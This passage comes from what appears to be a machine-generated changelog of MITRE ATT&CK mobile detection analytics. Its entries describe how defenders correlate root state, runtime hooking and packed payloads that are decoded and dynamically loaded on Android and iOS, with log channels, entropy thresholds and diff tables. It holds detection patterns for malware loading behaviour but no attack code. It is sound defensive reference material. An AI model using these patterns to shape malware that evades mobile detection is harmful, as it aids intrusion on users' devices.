class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-activity&nbsp;effects&nbsp;where&nbsp;mobile&nbsp;telemetry&nbsp;is&nbsp;available.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--dd1b3351-f8e5-480e-9e7d-f9cfbbf01409",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 19:56:13.060000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0719#AN1850",
                            "external_id": "AN1850"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1850",
                    "description": "Correlates (1) device posture changes indicating root or elevated privilege state, (2) runtime framework manipulation or injection into application processes, and (3) anomalous API behavior or suppressed security signals. The defender observes a causal chain where an application gains privileged execution context, interacts with system frameworks (e.g., ART/Zygote), and modifies expected API outputs or suppresses security-relevant signals such as permission checks, sensor access reporting, or process visibility.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Defines correlation window between root detection, runtime manipulation, and anomalous API behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of known applications that legitimately use instrumentation or debugging frameworks"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Determines whether suspicious API manipulation must occur in background to increase fidelity"
                        },
                        {
                            "field": "IntegritySignalSource",
                            "description": "Defines which attestation signals (Play Integrity, OEM attestation) are trusted in the environment"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Defines correlation window between root detection, runtime manipulation, and anomalous API behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of known applications that legitimately use instrumentation or debugging frameworks\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Determines whether suspicious API manipulation must occur in background to increase fidelity\"}, {\"field\": \"IntegritySignalSource\", \"description\": \"Defines which attestation signals (Play Integrity, OEM attestation) are trusted in the environment\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 19:56:13.060000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) device posture changes indicating root or elevated privilege state, (2) runtime framework manipulation or injection into application processes, and (3) anomalous API behavior or suppressed security signals. The defender observes a causal chain where an application gains privileged execution context, interacts with system frameworks (e.g., ART/Zygote), and modifies expected API outputs or suppresses security-relevant signals such as permission checks, sensor access reporting, or process visibility.\", \"old_value\": \"Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to114__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to114__0\"><a href=\"#difflib_chg_to114__top\">t</a></td><td class=\"diff_header\" id=\"from114_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Hooking&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and&nbsp;therefore&nbsp;enterprise</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to114__top\">t</a></td><td class=\"diff_header\" id=\"to114_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;device&nbsp;posture&nbsp;changes&nbsp;indicating&nbsp;root&nbsp;or&nbsp;ele</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vated&nbsp;privilege&nbsp;state,&nbsp;(2)&nbsp;runtime&nbsp;framework&nbsp;manipulation&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;injection&nbsp;into&nbsp;application&nbsp;processes,&nbsp;and&nbsp;(3)&nbsp;anomalous&nbsp;API</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;behavior&nbsp;or&nbsp;suppressed&nbsp;security&nbsp;signals.&nbsp;The&nbsp;defender&nbsp;obser</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ves&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;application&nbsp;gains&nbsp;privileged&nbsp;exe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cution&nbsp;context,&nbsp;interacts&nbsp;with&nbsp;system&nbsp;frameworks&nbsp;(e.g.,&nbsp;ART/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">Zygote),&nbsp;and&nbsp;modifies&nbsp;expected&nbsp;API&nbsp;outputs&nbsp;or&nbsp;suppresses&nbsp;sec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">urity-relevant&nbsp;signals&nbsp;such&nbsp;as&nbsp;permission&nbsp;checks,&nbsp;sensor&nbsp;acc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ess&nbsp;reporting,&nbsp;or&nbsp;process&nbsp;visibility.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6fb4668b-9c70-44d2-87a3-43ff2dc699f2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-16 16:27:24.678000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0720#AN1851",
                            "external_id": "AN1851"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1851",
                    "description": "Defender correlates a sandboxed app writing high-entropy or encoded artifacts (often in app-private or shared storage), performing decode/decompress/reassembly, then dynamically loading/execing the resulting code (DexClassLoader/JNI dlopen) or spawning a helper process. Sequence: high-entropy file writes \u2192 decode/unpack bursts \u2192 new .dex/.so/.jar creation in temp/obfuscated paths \u2192 dynamic load or shell spawn within a tight window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "android:logcat",
                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
                            "name": "android:logcat",
                            "channel": "SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max interval to correlate write\u2192decode\u2192load stages (e.g., 5\u201360s depending on device performance)."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Shannon entropy threshold to flag likely obfuscated blobs (e.g., \u2265 7.2)."
                        },
                        {
                            "field": "SuspiciousWriteDirs",
                            "description": "Directories to monitor (e.g., app /files, cache, /sdcard/Download). OEMs vary."
                        },
                        {
                            "field": "ChunkCountThreshold",
                            "description": "Minimum count of small sequential writes (split payload reassembly)."
                        },
                        {
                            "field": "NetworkCDNAllowlist",
                            "description": "Benign CDNs/hosts for large opaque downloads to reduce FPs."
                        },
                        {
                            "field": "ExecPathRegex",
                            "description": "Regex for newly loaded .dex/.so/.jar/temp artifacts."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background or developer mode context to suppress test noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max interval to correlate write\\u2192decode\\u2192load stages (e.g., 5\\u201360s depending on device performance).\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Shannon entropy threshold to flag likely obfuscated blobs (e.g., \\u2265 7.2).\"}, {\"field\": \"SuspiciousWriteDirs\", \"description\": \"Directories to monitor (e.g., app /files, cache, /sdcard/Download). OEMs vary.\"}, {\"field\": \"ChunkCountThreshold\", \"description\": \"Minimum count of small sequential writes (split payload reassembly).\"}, {\"field\": \"NetworkCDNAllowlist\", \"description\": \"Benign CDNs/hosts for large opaque downloads to reduce FPs.\"}, {\"field\": \"ExecPathRegex\", \"description\": \"Regex for newly loaded .dex/.so/.jar/temp artifacts.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background or developer mode context to suppress test noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-16 16:27:24.678000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a sandboxed app writing high-entropy or encoded artifacts (often in app-private or shared storage), performing decode/decompress/reassembly, then dynamically loading/execing the resulting code (DexClassLoader/JNI dlopen) or spawning a helper process. Sequence: high-entropy file writes \\u2192 decode/unpack bursts \\u2192 new .dex/.so/.jar creation in temp/obfuscated paths \\u2192 dynamic load or shell spawn within a tight window.\", \"old_value\": \"Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"android:logcat\", \"channel\": \"Short burst of file I/O followed by JNI/dlopen of a newly created .so\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"android:logcat\", \"channel\": \"SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to124__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to124__0\"><a href=\"#difflib_chg_to124__top\">t</a></td><td class=\"diff_header\" id=\"from124_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Dynamic&nbsp;analysis,&nbsp;when&nbsp;used&nbsp;in&nbsp;application&nbsp;vetting,&nbsp;may&nbsp;in&nbsp;s</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to124__top\">t</a></td><td class=\"diff_header\" id=\"to124_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;sandboxed&nbsp;app&nbsp;writing&nbsp;high-entropy&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ome&nbsp;cases&nbsp;be&nbsp;able&nbsp;to&nbsp;identify&nbsp;malicious&nbsp;code&nbsp;in&nbsp;obfuscated&nbsp;o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">encoded&nbsp;artifacts&nbsp;(often&nbsp;in&nbsp;app-private&nbsp;or&nbsp;shared&nbsp;storage),&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">r&nbsp;encrypted&nbsp;form&nbsp;by&nbsp;detecting&nbsp;the&nbsp;code&nbsp;at&nbsp;execution&nbsp;time&nbsp;(af</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">performing&nbsp;decode/decompress/reassembly,&nbsp;then&nbsp;dynamically&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;it&nbsp;is&nbsp;deobfuscated&nbsp;or&nbsp;decrypted).&nbsp;Some&nbsp;application&nbsp;vetti</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ading/execing&nbsp;the&nbsp;resulting&nbsp;code&nbsp;(DexClassLoader/JNI&nbsp;dlopen)</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ng&nbsp;techniques&nbsp;apply&nbsp;reputation&nbsp;analysis&nbsp;of&nbsp;the&nbsp;application&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;spawning&nbsp;a&nbsp;helper&nbsp;process.&nbsp;Sequence:&nbsp;high-entropy&nbsp;file&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eveloper&nbsp;and&nbsp;can&nbsp;alert&nbsp;to&nbsp;potentially&nbsp;suspicious&nbsp;application</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rites&nbsp;\u2192&nbsp;decode/unpack&nbsp;bursts&nbsp;\u2192&nbsp;new&nbsp;.dex/.so/.jar&nbsp;creation&nbsp;in</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;without&nbsp;actual&nbsp;examination&nbsp;of&nbsp;application&nbsp;code.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;temp/obfuscated&nbsp;paths&nbsp;\u2192&nbsp;dynamic&nbsp;load&nbsp;or&nbsp;shell&nbsp;spawn&nbsp;within&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;tight&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--739bd746-e98b-45cb-8bc6-3c8876745b4a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 17:05:14.514000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0720#AN1852",
                            "external_id": "AN1852"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1852",
                    "description": "Defender correlates a sandboxed app downloading or receiving opaque/encoded blobs, writing high-entropy content into container/tmp, performing decode/decompress/reassembly, and then executing/loaded as Mach-O or bundle (dlopen) or leveraging JIT/RWX pages to run the decoded payload. Sequence: opaque download or IPC \u2192 high-entropy writes/split-file bursts \u2192 decode/unarchive \u2192 new Mach-O/bundle in tmp \u2192 dlopen/posix_spawn or RWX region activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "iOS:unifiedlog",
                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "iOS:unifiedlog",
                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max interval to link write\u2192decode\u2192load/exec (e.g., 5\u201345s depending on device and iOS version)."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Entropy threshold to consider a file obfuscated/packed (e.g., \u2265 7.3)."
                        },
                        {
                            "field": "SplitWriteBurstMin",
                            "description": "Minimum count of small sequential writes to flag reassembly behaviors."
                        },
                        {
                            "field": "AppContainerPaths",
                            "description": "Container subpaths to monitor (tmp, Library/Caches, Documents) vary by policy."
                        },
                        {
                            "field": "KnownGoodBundles",
                            "description": "Allowlist of legitimate dynamically loaded bundles/plugins to reduce FPs."
                        },
                        {
                            "field": "PerAppVPNAllowlist",
                            "description": "Known enterprise services carrying opaque archives to avoid false alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max interval to link write\\u2192decode\\u2192load/exec (e.g., 5\\u201345s depending on device and iOS version).\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Entropy threshold to consider a file obfuscated/packed (e.g., \\u2265 7.3).\"}, {\"field\": \"SplitWriteBurstMin\", \"description\": \"Minimum count of small sequential writes to flag reassembly behaviors.\"}, {\"field\": \"AppContainerPaths\", \"description\": \"Container subpaths to monitor (tmp, Library/Caches, Documents) vary by policy.\"}, {\"field\": \"KnownGoodBundles\", \"description\": \"Allowlist of legitimate dynamically loaded bundles/plugins to reduce FPs.\"}, {\"field\": \"PerAppVPNAllowlist\", \"description\": \"Known enterprise services carrying opaque archives to avoid false alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:05:14.514000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a sandboxed app downloading or receiving opaque/encoded blobs, writing high-entropy content into container/tmp, performing decode/decompress/reassembly, and then executing/loaded as Mach-O or bundle (dlopen) or leveraging JIT/RWX pages to run the decoded payload. Sequence: opaque download or IPC \\u2192 high-entropy writes/split-file bursts \\u2192 decode/unarchive \\u2192 new Mach-O/bundle in tmp \\u2192 dlopen/posix_spawn or RWX region activity.\", \"old_value\": \"Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"iOS:unifiedlog\", \"channel\": \"dyld: dlopen/dyld_cache load from non-standard app-writable path\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to73__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to73__0\"><a href=\"#difflib_chg_to73__top\">t</a></td><td class=\"diff_header\" id=\"from73_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Dynamic&nbsp;analysis,&nbsp;when&nbsp;used&nbsp;in&nbsp;application&nbsp;vetting,&nbsp;may&nbsp;in&nbsp;s</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to73__top\">t</a></td><td class=\"diff_header\" id=\"to73_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;sandboxed&nbsp;app&nbsp;downloading&nbsp;or&nbsp;receiving</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ome&nbsp;cases&nbsp;be&nbsp;able&nbsp;to&nbsp;identify&nbsp;malicious&nbsp;code&nbsp;in&nbsp;obfuscated&nbsp;o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;opaque/encoded&nbsp;blobs,&nbsp;writing&nbsp;high-entropy&nbsp;content&nbsp;into&nbsp;con</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 